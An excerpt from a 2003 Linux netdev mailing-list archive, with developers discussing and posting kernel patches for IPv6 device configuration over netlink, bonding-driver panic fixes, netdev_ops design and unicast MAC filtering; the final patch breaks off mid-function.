[127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA04168; Wed, 30 Jul 2003 22:02:23 -0700 Date: Wed, 30 Jul 2003 22:02:23 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030730220223.4c25fcfe.davem@redhat.com> In-Reply-To: References: <20030724000705.4662df54.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4407 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 17:33:03 -0700 (PDT) Krishna Kumar wrote: > Since use_tempaddr can be -1, I am for the time being keeping all > the variables as s32. If this is changed to __u32, then some code in > addrconf.c needs to be modified. Ok, but then please use "__s32". > > I think something more like route metrics, ie. an array is more appropriate > > I guess you mean only the user interface to use route type metrics, not > modify the existing cnf implementation to use this concept (eg remove the > structure and define cnf_metrics[] with code similar to RTAX_HOPLIMIT, > etc). So this patch doesn't change the usage in kernel, except now the > user interface returns the config params in an array format. > > This patch applies on top of the prefix list patch. I like the array scheme, but please you must define macros (like RTAX_*) that give meaning to the array[] indices. From willy@www.linux.org.uk Thu Jul 31 04:12:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 04:12:53 -0700 (PDT) Received: from www.linux.org.uk (IDENT:DJ19fHNGhXHb6DApD4d8+s+Qj4yRYdUQ@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VBCiFl009750 for ; Thu, 31 Jul 2003 04:12:45 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19iBMP-0007lI-Gv; Thu, 31 Jul 2003 12:12:41 +0100 Date: Thu, 31 Jul 2003 12:12:41 +0100 From: Matthew Wilcox To: "David S. Miller" Cc: Arnaldo Carvalho de Melo , willy@debian.org, netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030731111241.GJ22222@parcelfarce.linux.theplanet.co.uk> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <20030730233541.GB7057@conectiva.com.br> <20030730164108.06062b72.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030730164108.06062b72.davem@redhat.com> User-Agent: Mutt/1.4.1i X-archive-position: 4408 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 04:41:08PM -0700, David S. Miller wrote: > I'm ok with the simplified ethtool-only version too. > > Although I'm confused about what kind of problem there is with > netdev_ops being such a "large structure". Hard to understand/keep track of is my main concern. There was also a namespace collision -- two functions called get_stats. It's now get_ethtool_stats. > This is the kind of thing there'd be _ONE_ copy of in each driver, > ala. > > struct netdev_ops tg3_netdev_ops { > ... > .foo = tg3_foo, > ... > }; > > ... > tp->dev->netdev_ops = &tg3_netdev_ops; > ... > > Right? I'm glad you mentioned tg3 as an example, since it's one of the ones where this isn't true. if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700) tp->dev->hard_start_xmit = tg3_start_xmit_4gbug; else tp->dev->hard_start_xmit = tg3_start_xmit; I fixed this with two netdev_ops structs, but imagine a driver with two or three more cases like this and everything starts to look quite nasty. I do think we want to do netdev_ops, but not now, and let's keep netdev_ops and ethtool_ops separate. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From rickp@rossfell.co.uk Thu Jul 31 06:15:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 06:15:35 -0700 (PDT) Received: from rolf.rossfell.co.uk (rolf.rossfell.co.uk [81.2.65.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VDFEFl019295 for ; Thu, 31 Jul 2003 06:15:15 -0700 Received: from fozzy.rossfell.co.uk (fozzy.rossfell.co.uk [81.2.65.138]) by rolf.rossfell.co.uk (Postfix) with ESMTP id 204796422B for ; Thu, 31 Jul 2003 13:49:24 +0100 (BST) Date: Thu, 31 Jul 2003 13:49:19 +0100 From: Rick Payne To: netdev@oss.sgi.com Subject: multiple unicast mac address (was Re: netdev_ops retraction) Message-ID: <2147483647.1059659359@fozzy.rossfell.co.uk> In-Reply-To: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> X-Mailer: Mulberry/3.0.3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 4409 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rickp@rossfell.co.uk Precedence: bulk X-list: netdev --On Wednesday, July 30, 2003 7:44 pm +0100 Matthew Wilcox wrote: > + void (*set_multicast_list)(struct net_device *dev); > + int (*set_mac_address)(struct net_device *dev, void *addr); Talking of which - is there any appetite for a patch that allows multiple unicast mac addresses to be set on an ethernet interface? Its certainly much neater for things like VRRP and HA stuff if an ethernet device is able to continue accepting packets for its original MAC address, as well as the 'virtual MAC address'. Obviously I'm not talking about generated packets (they will still take the MAC address from dev->dev_addr) - I'm talking about the hardware filter on the ethernet cards themselves. (In some cases, the software concerned may want to set_mac_address - thus updating dev->dev_addr, and then also add the original mac address to the 'unicast accept list' for instance). Some ethernet cards seem to support this and don't care what MAC addresses get put in the multicast list - and I've used that technique before (on cards such as the eepro100 for instance). Others may have a different, not currently used method to set multiple unicast MAC addresses. Finally, as a worst last case - a card could go into promiscuous mode and filter in software. Should I just start on a patch and submit it here for comment? Rick From lmb@suse.de Thu Jul 31 06:55:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 06:56:06 -0700 (PDT) Received: from mx.in-addr.de (gate.in-addr.de [212.8.193.158]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VDtmFl023821 for ; Thu, 31 Jul 2003 06:55:49 -0700 Received: by mx.in-addr.de (mx.in-addr.de, from userid 10) id 1DB2213C8; Thu, 31 Jul 2003 15:27:53 +0200 (CEST) Received: by hermes.in-addr.de (Postfix, from userid 500) id 87D1BB4C; Thu, 31 Jul 2003 15:27:45 +0200 (CEST) Date: Thu, 31 Jul 2003 15:27:45 +0200 From: Lars Marowsky-Bree To: Rick Payne , netdev@oss.sgi.com Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction) Message-ID: <20030731132745.GQ29577@marowsky-bree.de> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DXIF1lRUlMsbZ3S1" Content-Disposition: inline In-Reply-To: <2147483647.1059659359@fozzy.rossfell.co.uk> User-Agent: Mutt/1.4i X-Ctuhulu: HASTUR X-archive-position: 4410 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lmb@suse.de Precedence: bulk X-list: netdev --DXIF1lRUlMsbZ3S1 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2003-07-31T13:49:19, Rick Payne said: > Some ethernet cards seem to support this and don't care what MAC addresse= s=20 > get put in the multicast list - and I've used that technique before (on= =20 > cards such as the eepro100 for instance). Others may have a different, no= t=20 > currently used method to set multiple unicast MAC addresses. Finally, as = a=20 > worst last case - a card could go into promiscuous mode and filter in=20 > software. >=20 > Should I just start on a patch and submit it here for comment? Please do. Sincerely, Lars Marowsky-Br=E9e --=20 SuSE Labs - Research & Development, SuSE Linux AG =20 "If anything can go wrong, it will." "Chance favors the prepared (mind)." -- Capt. Edward A. Murphy -- Louis Pasteur --DXIF1lRUlMsbZ3S1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE/KRlQudf3XQV4S2cRArrwAJ40JywXivobQaFGH0tQ6+4ry25/+QCggzHr zk/k2btBhP8sMaGWkLyWUR0= =F4R8 -----END PGP SIGNATURE----- --DXIF1lRUlMsbZ3S1-- From chas@locutus.cmf.nrl.navy.mil Thu Jul 31 07:27:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 07:27:34 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VERMFl026915 for ; Thu, 31 Jul 2003 07:27:22 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6VERHsG023837; Thu, 31 Jul 2003 10:27:17 -0400 (EDT) Message-Id: <200307311427.h6VERHsG023837@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: hch@infradead.org, netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex In-reply-to: Your message of "Wed, 30 Jul 2003 15:58:44 PDT." <20030730155844.43ca22d9.davem@redhat.com> Date: Thu, 31 Jul 2003 10:24:34 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4411 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030730155844.43ca22d9.davem@redhat.com>,"David S. Miller" writes: >I really don't consider this critical at all. And itsy bitsy fixes >like this continually pouring into Marcelo's tree in late stages are >why his releases get delayed for so long, and I'm not going to >contribute to that problem. fine with me. like i said, i am not pressed about it. From jgarzik@pobox.com Thu Jul 31 07:44:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 07:44:31 -0700 (PDT) Received: from www.linux.org.uk (IDENT:nOL8VGTw8Px86pjv4l2MtFCVRmCuchm2@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VEiKFl028478 for ; Thu, 31 Jul 2003 07:44:22 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19iEfD-0002qJ-GY; Thu, 31 Jul 2003 15:44:19 +0100 Message-ID: <3F292B38.4070508@pobox.com> Date: Thu, 31 Jul 2003 10:44:08 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Rick Payne CC: netdev@oss.sgi.com Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction) References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk> In-Reply-To: <2147483647.1059659359@fozzy.rossfell.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4412 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Rick Payne wrote: > > --On Wednesday, July 30, 2003 7:44 pm +0100 Matthew Wilcox > wrote: > >> + void (*set_multicast_list)(struct net_device *dev); >> + int (*set_mac_address)(struct net_device *dev, void *addr); > > > Talking of which - is there any appetite for a patch that allows > multiple unicast mac addresses to be set on an ethernet interface? Its > certainly much neater for things like VRRP and HA stuff if an ethernet > device is able to continue accepting packets for its original MAC > address, as well as the 'virtual MAC address'. > > Obviously I'm not talking about generated packets (they will still take > the MAC address from dev->dev_addr) - I'm talking about the hardware > filter on the ethernet cards themselves. (In some cases, the software > concerned may want to set_mac_address - thus updating dev->dev_addr, and > then also add the original mac address to the 'unicast accept list' for > instance). This feature request comes up about once a year. Search the archives for responses... Hardware that filters N MAC addresses (unicast filtering) doesn't have a terribly standard interface, and the unicast filter must be adjusted at different times on different hardware. Also, chip bugs lead one to think unicast filtering will work where it doesn't. Also, chip limits for some of the more popular chips are unknown. Also, the need for this feature is very uncommon, and can be achieved in other ways. Jeff From rickp@rossfell.co.uk Thu Jul 31 08:45:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 08:45:32 -0700 (PDT) Received: from rolf.rossfell.co.uk (rolf.rossfell.co.uk [81.2.65.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VFjFFl001387 for ; Thu, 31 Jul 2003 08:45:15 -0700 Received: from fozzy.rossfell.co.uk (fozzy.rossfell.co.uk [81.2.65.138]) by rolf.rossfell.co.uk (Postfix) with ESMTP id 6B33F642ED; Thu, 31 Jul 2003 16:09:28 +0100 (BST) Date: Thu, 31 Jul 2003 16:09:26 +0100 From: Rick Payne To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction) Message-ID: <2147483647.1059667766@fozzy.rossfell.co.uk> In-Reply-To: <3F292B38.4070508@pobox.com> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk> <3F292B38.4070508@pobox.com> X-Mailer: Mulberry/3.0.3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 4413 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rickp@rossfell.co.uk Precedence: bulk X-list: netdev --On Thursday, July 31, 2003 10:44 am -0400 Jeff Garzik wrote: > Hardware that filters N MAC addresses (unicast filtering) doesn't have a > terribly standard interface, and the unicast filter must be adjusted at Indeed but where its possible to support it, it can be - and those cards will be specified by those who need it (for HA, VRRP etc). > different times on different hardware. Also, chip bugs lead one to think > unicast filtering will work where it doesn't. Also, chip limits for some > of the more popular chips are unknown. Also, the need for this feature > is very uncommon, and can be achieved in other ways. As I said - promiscuous mode and filtering on the receive side - which is what you have to resort to anyway for those cards that don't support it. Alternatively, its just another patch people need to add to make things do what they want - just like the ARP patch. Rick From jgarzik@pobox.com Thu Jul 31 11:50:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 11:50:57 -0700 (PDT) Received: from www.linux.org.uk (IDENT:1WYuSucE4i8h/KuTWFW/oNXdJGQ9iGNu@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VIorFl016520 for ; Thu, 31 Jul 2003 11:50:54 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19iIVk-0006hQ-Pp; Thu, 31 Jul 2003 19:50:48 +0100 Message-ID: <3F2964FC.1030805@pobox.com> Date: Thu, 31 Jul 2003 14:50:36 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Willy Tarreau CC: davem@redhat.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes References: <20030730140658.GA14437@alpha.home.local> In-Reply-To: <20030730140658.GA14437@alpha.home.local> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4414 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Applied patches 1 and 3, and will forward to Marcelo today. From garzik@gtf.org Thu Jul 31 12:16:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 12:17:02 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VJGtFl017262 for ; Thu, 31 Jul 2003 12:16:56 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 3637E6685; Thu, 31 Jul 2003 15:16:46 -0400 (EDT) Date: Thu, 31 Jul 2003 15:16:46 -0400 From: Jeff Garzik To: marcelo@conectiva.com.br Cc: alan@redhat.com, netdev@oss.sgi.com Subject: [bk patches] 2.4.x net drvr bug fixes Message-ID: <20030731191646.GA30639@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4415 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Marcelo, please do a bk pull bk://gkernel.bkbits.net/net-drivers-2.4 Others may download the patch (included below) from ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre10-netdrvr1.patch.bz2 This will update the following files: Documentation/networking/ifenslave.c | 3 +-- drivers/net/bonding/bond_main.c | 15 +++++++++------ 2 files changed, 10 insertions(+), 8 deletions(-) through these ChangeSets: (03/07/31 1.1051) [netdrvr bonding] fix ifenslave ia64 build (03/07/31 1.1050) [netdrvr bonding] fix kernel panic when optional feature used - now the last one fixes a kernel panic due to a cheap hack which was introduced to determine the source IP address to use with ARP checks. It takes the first address of the first slave, and puts a lock on it. If there's no address, its ip_ptr is NULL, and the kernel panics while trying to get the lock. You can reproduce it easily this way : # modprobe eth0 # modprobe bonding mode=active-backup miimon=1000 # ip link set bond0 up # ifenslave bond0 eth0 => kernel panic ! (03/07/31 1.1049) [netdrvr bonding] fix a typo in the MODULE_PARM_DESC diff -Nru a/Documentation/networking/ifenslave.c b/Documentation/networking/ifenslave.c --- a/Documentation/networking/ifenslave.c Thu Jul 31 15:13:34 2003 +++ b/Documentation/networking/ifenslave.c Thu Jul 31 15:13:34 2003 @@ -140,8 +140,7 @@ #include #include #include -#include -#include +#include #include #include #include diff -Nru a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c --- a/drivers/net/bonding/bond_main.c Thu Jul 31 15:13:34 2003 +++ b/drivers/net/bonding/bond_main.c Thu Jul 31 15:13:34 2003 @@ -524,7 +524,7 @@ MODULE_PARM(miimon, "i"); MODULE_PARM_DESC(miimon, "Link check interval in milliseconds"); MODULE_PARM(use_carrier, "i"); -MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 09 for off, 1 for on (default)"); +MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 0 for off, 1 for on (default)"); MODULE_PARM(mode, "s"); MODULE_PARM_DESC(mode, "Mode of operation : 0 for round robin, 1 for active-backup, 2 for xor"); MODULE_PARM(arp_interval, "i"); @@ -1594,11 +1594,14 @@ #endif bond_set_slave_inactive_flags(new_slave); } - read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); - ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); - ifa = *ifap; - my_ip = ifa->ifa_address; - read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + if (((struct in_device *)slave_dev->ip_ptr) != NULL) { + read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); + ifa = *ifap; + if (ifa != NULL) + my_ip = ifa->ifa_address; + read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + } /* if there is a primary slave, remember it */ if (primary != NULL) { From krkumar@us.ibm.com Thu Jul 31 13:38:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 13:38:29 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VKbuFl024153 for ; Thu, 31 Jul 2003 13:38:03 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6VKb8kh120936; Thu, 31 Jul 2003 16:37:09 -0400 Received: from linux-udp11920777uds.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6VKb6YF066986; Thu, 31 Jul 2003 16:37:07 -0400 Date: Thu, 31 Jul 2003 13:33:27 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430 To: "David S. Miller" cc: kuznet@ms2.inr.ac.ru, , , KK Subject: Re: O/M flags against 2.6.0-test1 In-Reply-To: <20030730220223.4c25fcfe.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4416 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Ok, but then please use "__s32". OK, slowly getting there :-) Latest patch follows : Thanks, - KK ------------------------------------------------------------------------------- diff -ruN linux-2.6.0-test1.plist/include/linux/ipv6.h linux-2.6.0-test1.new/include/linux/ipv6.h --- linux-2.6.0-test1.plist/include/linux/ipv6.h 2003-07-13 20:36:33.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/ipv6.h 2003-07-31 11:20:48.000000000 -0700 @@ -122,6 +122,52 @@ struct in6_addr daddr; }; +/* + * This structure contains configuration options per IPv6 link. + */ +struct ipv6_devconf { + __s32 forwarding; + __s32 hop_limit; + __s32 mtu6; + __s32 accept_ra; + __s32 accept_redirects; + __s32 autoconf; + __s32 dad_transmits; + __s32 rtr_solicits; + __s32 rtr_solicit_interval; + __s32 rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + __s32 use_tempaddr; + __s32 temp_valid_lft; + __s32 temp_prefered_lft; + __s32 regen_max_retry; + __s32 max_desync_factor; +#endif + void *sysctl; +}; + +/* index values for the variables in ipv6_devconf */ +enum { + DEVCONF_FORWARDING = 0, + DEVCONF_HOPLIMIT, + DEVCONF_MTU6, + DEVCONF_ACCEPT_RA, + DEVCONF_ACCEPT_REDIRECTS, + DEVCONF_AUTOCONF, + DEVCONF_DAD_TRANSMITS, + DEVCONF_RTR_SOLICITS, + DEVCONF_RTR_SOLICIT_INTERVAL, + DEVCONF_RTR_SOLICIT_DELAY, +#ifdef CONFIG_IPV6_PRIVACY + DEVCONF_USE_TEMPADDR, + DEVCONF_TEMP_VALID_LFT, + DEVCONF_TEMP_PREFERED_LFT, + DEVCONF_REGEN_MAX_RETRY, + DEVCONF_MAX_DESYNC_FACTOR, +#endif + DEVCONF_MAX +}; + #ifdef __KERNEL__ #include /* struct sockaddr_in6 */ #include diff -ruN linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- linux-2.6.0-test1.plist/include/linux/rtnetlink.h 2003-07-31 12:00:39.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-31 11:30:57.000000000 -0700 @@ -477,10 +477,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, /* Protocol specific information for a link */ +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -514,6 +516,18 @@ for IPIP tunnels, when route to endpoint is allowed to change) */ +/* Subtype attributes for IFLA_PROTINFO */ +enum +{ + IFLA_INET6_UNSPEC, + IFLA_INET6_FLAGS, /* link flags */ + IFLA_INET6_CONF, /* sysctl parameters */ + IFLA_INET6_STATS, /* statistics */ + IFLA_INET6_MCAST, /* MC things. What of them? */ +}; + +#define IFLA_INET6_MAX IFLA_INET6_MCAST + /***************************************************************** * Traffic control messages. ****/ diff -ruN linux-2.6.0-test1.plist/include/net/if_inet6.h linux-2.6.0-test1.new/include/net/if_inet6.h --- linux-2.6.0-test1.plist/include/net/if_inet6.h 2003-07-13 20:38:43.000000000 -0700 +++ linux-2.6.0-test1.new/include/net/if_inet6.h 2003-07-31 11:25:46.000000000 -0700 @@ -16,7 +16,12 @@ #define _NET_IF_INET6_H #include +#include +/* inet6_dev.if_flags */ + +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 @@ -132,28 +137,6 @@ #define IFA_SITE IPV6_ADDR_SITELOCAL #define IFA_GLOBAL 0x0000U -struct ipv6_devconf -{ - int forwarding; - int hop_limit; - int mtu6; - int accept_ra; - int accept_redirects; - int autoconf; - int dad_transmits; - int rtr_solicits; - int rtr_solicit_interval; - int rtr_solicit_delay; -#ifdef CONFIG_IPV6_PRIVACY - int use_tempaddr; - int temp_valid_lft; - int temp_prefered_lft; - int regen_max_retry; - int max_desync_factor; -#endif - void *sysctl; -}; - struct ipv6_devstat { struct proc_dir_entry *proc_dir_entry; DEFINE_SNMP_STAT(struct icmpv6_mib, icmpv6); diff -ruN linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- linux-2.6.0-test1.plist/net/ipv6/addrconf.c 2003-07-31 12:00:39.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-31 11:43:54.000000000 -0700 @@ -2510,7 +2510,107 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +static void inline ipv6_store_devconf(struct ipv6_devconf *cnf, __s32 *array) +{ + array[DEVCONF_FORWARDING] = cnf->forwarding; + array[DEVCONF_HOPLIMIT] = cnf->hop_limit; + array[DEVCONF_MTU6] = cnf->mtu6; + array[DEVCONF_ACCEPT_RA] = cnf->accept_ra; + array[DEVCONF_ACCEPT_REDIRECTS] = cnf->accept_redirects; + array[DEVCONF_AUTOCONF] = cnf->autoconf; + array[DEVCONF_DAD_TRANSMITS] = cnf->dad_transmits; + array[DEVCONF_RTR_SOLICITS] = cnf->rtr_solicits; + array[DEVCONF_RTR_SOLICIT_INTERVAL] = cnf->rtr_solicit_interval; + array[DEVCONF_RTR_SOLICIT_DELAY] = cnf->rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + array[DEVCONF_USE_TEMPADDR] = cnf->use_tempaddr; + array[DEVCONF_TEMP_VALID_LFT] = cnf->temp_valid_lft; + array[DEVCONF_TEMP_PREFERED_LFT] = cnf->temp_prefered_lft; + array[DEVCONF_REGEN_MAX_RETRY] = cnf->regen_max_retry; + array[DEVCONF_MAX_DESYNC_FACTOR] = cnf->max_desync_factor; +#endif +} + +static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct inet6_dev *idev, + int type, u32 pid, u32 seq) +{ + __s32 *array = NULL; + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET6; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + subattr = (struct rtattr*)skb->tail; + + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + + /* return the device flags */ + RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags); + + /* return the device sysctl params */ + if ((array = kmalloc(DEVCONF_MAX * sizeof(*array), GFP_KERNEL)) == NULL) + goto rtattr_failure; + ipv6_store_devconf(&idev->cnf, array); + RTA_PUT(skb, IFLA_INET6_CONF, DEVCONF_MAX * sizeof(*array), array); + + /* XXX - Statistics/MC not implemented */ + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + kfree(array); + return skb->len; + +nlmsg_failure: +rtattr_failure: + if 